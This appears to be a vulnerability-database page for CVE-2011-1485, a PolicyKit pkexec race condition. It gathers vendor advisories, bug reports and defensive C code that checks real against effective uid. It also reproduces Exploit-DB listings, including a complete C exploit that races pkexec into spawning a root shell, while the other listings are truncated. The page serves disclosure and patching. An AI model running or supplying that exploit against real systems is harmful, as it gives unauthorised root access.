CVE-2011-1485
Published 2011-05-31
Priority P3 | 37 | medium | 6.9 (CVSS 2.0)
Vector: AV:L/AC:M/Au:N/C:C/I:C/A:C
Exploit: public (see the Exploit-DB and Metasploit entries below)
EPSS: 5.25% (91.5th percentile)
Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit) 0.96 allows local users to gain privileges by executing a setuid program from pkexec, related to the use of the effective user ID instead of the real user ID.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | policykit-1 | < policykit-1 0.101-4 (bookworm) | policykit-1 0.101-4 (bookworm) |
| redhat | policykit | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 6.9 | MEDIUM | AV:L/AC:M/Au:N/C:C/I:C/A:C |
| osv | — | 6.9 | MEDIUM | — |
| vendor_debian | — | 6.9 | MEDIUM | — |
| vendor_redhat | — | 6.9 | MEDIUM | — |
Red Hat
polkit: polkitd/pkexec vulnerability
vendor_redhat · 2011-04-19 · CVSS 6.9 (MEDIUM)
Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit) 0.96 allows local users to gain privileges by executing a setuid program from pkexec, related to the use of the effective user ID instead of the real user ID.
Ubuntu
PolicyKit vulnerability
vendor_ubuntu · 2011-04-19
Summary: Local users could gain root access by using the pkexec tool in PolicyKit.
Neel Mehta discovered that PolicyKit did not correctly verify the user making authorization requests. A local attacker could exploit this to trick pkexec into running applications with root privileges.
Instructions: After a standard system update you need to reboot your computer to make all the necessary changes.
Debian
CVE-2011-1485: policykit-1 - Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit)
vendor_debian · 2011 · CVSS 6.9 (MEDIUM)
Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit) 0.96 allows local users to gain privileges by executing a setuid program from pkexec, related to the use of the effective user ID instead of the real user ID.
Scope: local
bookworm: resolved (fixed in 0.101-4)
bullseye: resolved (fixed in 0.101-4)
forky: resolved (fixed in 0.101-4)
sid: resolved (fixed in 0.101-4)
trixie: resolved (fixed in 0.101-4)
GHSA
GHSA-mjm4-2fq8-2392: Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit) 0.96
ghsa_unreviewed · 2022-05-17 · MEDIUM · CWE-362
Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit) 0.96 allows local users to gain privileges by executing a setuid program from pkexec, related to the use of the effective user ID instead of the real user ID.
OSV
CVE-2011-1485: Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit) 0.96
osv · 2011-05-31 · CVSS 6.9 (MEDIUM)
Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit) 0.96 allows local users to gain privileges by executing a setuid program from pkexec, related to the use of the effective user ID instead of the real user ID.
No detection rules found.
Exploit-DB
Linux PolicyKit - Race Condition Privilege Escalation (Metasploit)
exploitdb · 2014-10-20
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class Metasploit4 < Msf::Exploit::Local
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Linux PolicyKit Race Condition Privilege Escalation',
      'Description' => %q(
        A race condition flaw was found in the PolicyKit pkexec utility and polkitd
        daemon. A local user could use this flaw to appear as a privileged user to
        pkexec, allowing them to execute arbitrary commands as root by running
        those commands with pkexec.
        Those vulnerable include RHEL6 prior to polkit-0.96-2.el6_0.1 and Ubuntu
        libpolkit-backend-1 prior to 0.96-2ubuntu1.1 (10.10) 0.96-2ubuntu0.1
        (10.04 LTS) and 0.94-1ubuntu1.1 (9.10)
      ),
      'License'     => MSF_LICENSE,
      'Author'      =>
        [
          'xi4oyu', # exploit
          '
Exploit-DB
pkexec - Race Condition Privilege Escalation
exploitdb · 2011-10-08 · CVSS 6.9 (MEDIUM)
---
/*
 * Exploit Title: pkexec Race condition (CVE-2011-1485) exploit
 * Author: xi4oyu
 * Tested on: rhel 6
 * CVE : 2011-1485
 * Linux pkexec exploit by xi4oyu , thx [email protected]
 * Have fun~
 * U can reach us @ http://www.wooyun.org :)
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <time.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>

int main(int argc, char *argv[], char **envp)
{
    time_t tim_seed1;
    pid_t pid_seed2;
    int result;
    struct stat stat_buff;
    /* setuid-root helper: exec'ing it in the parent flips that process's
     * effective uid to 0, which is what pkexec/polkitd 0.96 read from /proc */
    char *chfn_path = "/usr/bin/chfn";
    char cmd_buff[4096];
    /* pkexec is asked to run a shell command; it authorizes its parent process */
    char *pkexec_argv[] = {
        "/usr/bin/pkexec",
        "/bin/sh",
        "-c",
        cmd_buff,
        NULL
    };
    int pipe1[2];
    int pipe2[2];
    int pipe3[2];
    pid_t pid, pid2;
    char *chfn_argv[] = {
        "/usr/bin/chfn",
        NULL
    };
    char buff[8];
    char read_buff[4096];
    char real_path
Exploit-DB
PolicyKit polkit-1 < 0.101 - Local Privilege Escalation
exploitdb · 2011-10-05 · CVSS 6.9 (MEDIUM)
---
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/inotify.h>

int main(int argc, char **argv)
{
    printf("=============================\n");
    printf("=      PolicyKit Pwnage     =\n");
    printf("=          by zx2c4         =\n");
    printf("=        Sept 2, 2011       =\n");
    printf("=============================\n\n");

    if (fork()) {
        /* Parent: the process pkexec and polkitd will look up in /proc,
         * because pkexec authorizes its parent. */
        int fd;
        char pid_path[1024];
        sprintf(pid_path, "/proc/%i", getpid());
        printf("[+] Configuring inotify for proper pid.\n");
        close(0); close(1); close(2);
        fd = inotify_init();
        if (fd < 0)
            perror("[-] inotify_init");
        /* Fire as soon as pkexec reads anything under /proc/<pid> while
         * gathering information about its parent (its own uid check). */
        inotify_add_watch(fd, pid_path, IN_ACCESS);
        /* A zero-length read blocks until the first event is queued and then
         * fails with EINVAL; only the wake-up matters here. */
        read(fd, NULL, 0);
        /* Now exec a setuid-root binary: our effective uid becomes 0, so when
         * polkitd later stat()s /proc/<pid> it sees a root-owned process. */
        execl("/usr/bin/chsh", "chsh", NULL);
    } else {
        /* Child: give the parent a second to arm the watch, then ask pkexec
         * for a root shell. */
        sleep(1);
        printf("[+] Launching pkexec.\n");
        execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
    }
    return 0;
}
Metasploit
Linux PolicyKit Race Condition Privilege Escalation
metasploit
A race condition flaw was found in the PolicyKit pkexec utility and polkitd daemon. A local user could use this flaw to appear as a privileged user to pkexec, allowing them to execute arbitrary commands as root by running those commands with pkexec. Those vulnerable include RHEL6 prior to polkit-0.96-2.el6_0.1 and Ubuntu libpolkit-backend-1 prior to 0.96-2ubuntu1.1 (10.10) 0.96-2ubuntu0.1 (10.04 LTS) and 0.94-1ubuntu1.1 (9.10)
Bugzilla
CVE-2011-1485 polkitd/pkexec vulnerability [fedora-all]
bugzilla · 2011-04-19 · CVSS 6.9 (MEDIUM)
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=692922
Please note: this issue affects multiple supported versions
Bugzilla
CVE-2011-1485 polkit: polkitd/pkexec vulnerability
bugzilla · 2011-04-01 · CVSS 6.9 (MEDIUM)
I was contacted privately about a potential vulnerability in polkitd and pkexec.
Briefly, the problem is that the UID for the parent process of pkexec(1) is read from /proc by stat(2)'ing /proc/PID.
The problem with this is that this returns the effective uid of the process which can easily be set to 0 by invoking a setuid-root binary such as /usr/bin/chsh in the parent process of pkexec(1). Instead we are really interested in the real-user-id.
While there's a check in pkexec.c to avoid this problem (by comparing it to what we expect the uid to be - namely that of the pkexec.c process itself which is the uid of the parent process at pkexec-spawn-time), there is still a short window where an attacker can fool pkexec/polkitd into thinkin
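The distinction the bug report draws, effective uid as reported by stat(2) on /proc/PID versus the real uid, as an added example in C. This is not polkit's code and not from the bug report; it assumes a Linux /proc, and the function names (proc_stat_owner, proc_status_uids, uid_mismatch, self_view_consistent) are mine. It reads the owner of /proc/PID the way polkit 0.96 did and, beside it, the real uid from the "Uid:" line of /proc/PID/status, which exec of a setuid binary does not change.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

/* Owner of a process as polkit 0.96 determined it: st_uid of /proc/PID.
 * The kernel reports the process's effective uid here, so a parent that
 * has exec'd a setuid-root binary (chsh, chfn, ...) shows up as uid 0.
 * Returns (uid_t)-1 on error. (Added example, not polkit's code.) */
uid_t proc_stat_owner(pid_t pid)
{
    char path[64];
    struct stat st;

    snprintf(path, sizeof path, "/proc/%ld", (long)pid);
    if (stat(path, &st) != 0)
        return (uid_t)-1;
    return st.st_uid;
}

/* Real and effective uid from the "Uid:" line of /proc/PID/status
 * (fields: real, effective, saved, filesystem). The real uid survives
 * exec of a setuid binary, which is why it is the value to authorize on.
 * Returns 0 on success, -1 if the file or the line is unavailable. */
int proc_status_uids(pid_t pid, uid_t *real, uid_t *effective)
{
    char path[64], line[256];
    FILE *f;
    int found = 0;

    snprintf(path, sizeof path, "/proc/%ld/status", (long)pid);
    f = fopen(path, "r");
    if (f == NULL)
        return -1;
    while (fgets(line, sizeof line, f) != NULL) {
        unsigned long r, e;
        if (strncmp(line, "Uid:", 4) == 0 &&
            sscanf(line + 4, "%lu %lu", &r, &e) == 2) {
            *real = (uid_t)r;
            *effective = (uid_t)e;
            found = 1;
            break;
        }
    }
    fclose(f);
    return found ? 0 : -1;
}

/* Returns 1 when the /proc owner (effective uid) and the real uid differ,
 * i.e. the process is in or past a setuid transition, which is exactly
 * the state the published exploits race the checker into; 0 when they
 * agree; -1 on error. An authorization decision should rest on the real uid. */
int uid_mismatch(pid_t pid)
{
    uid_t real, eff, owner;

    if (proc_status_uids(pid, &real, &eff) != 0)
        return -1;
    owner = proc_stat_owner(pid);
    if (owner == (uid_t)-1)
        return -1;
    return owner != real ? 1 : 0;
}

/* Sanity check on the calling process: the /proc view must agree with
 * getuid()/geteuid(). Returns 1 if it does, 0 otherwise. */
int self_view_consistent(void)
{
    uid_t real, eff;

    if (proc_status_uids(getpid(), &real, &eff) != 0)
        return 0;
    return real == getuid() && eff == geteuid() &&
           proc_stat_owner(getpid()) == geteuid();
}

int main(void)
{
    uid_t real, eff;
    pid_t me = getpid();

    if (proc_status_uids(me, &real, &eff) != 0) {
        perror("/proc/self/status");
        return 1;
    }
    printf("pid %ld: /proc owner %lu, real uid %lu, effective uid %lu, mismatch=%d\n",
           (long)me, (unsigned long)proc_stat_owner(me),
           (unsigned long)real, (unsigned long)eff, uid_mismatch(me));
    return 0;
}
```

Run it from an ordinary shell and all three values agree; run it with PID of a process that has just exec'd a setuid-root binary and proc_stat_owner() reports 0 while the real uid stays that of the invoking user, which is the difference the exploits above depend on. Reading the real uid removes this particular trick; the read is still a point-in-time snapshot, so a caller must also cope with the target changing identity or exiting between the read and the decision, the "short window" the comment above describes.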
References
- http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058752.html
- http://lists.fedoraproject.org/pipermail/package-announce/2011-May/059859.html
- http://secunia.com/advisories/48817
- http://security.gentoo.org/glsa/glsa-201204-06.xml
- http://securityreason.com/securityalert/8424
- http://www.debian.org/security/2011/dsa-2319
- http://www.mandriva.com/security/advisories?name=MDVSA-2011:086
- http://www.redhat.com/support/errata/RHSA-2011-0455.html
- http://www.ubuntu.com/usn/USN-1117-1
- https://bugzilla.redhat.com/show_bug.cgi?id=692922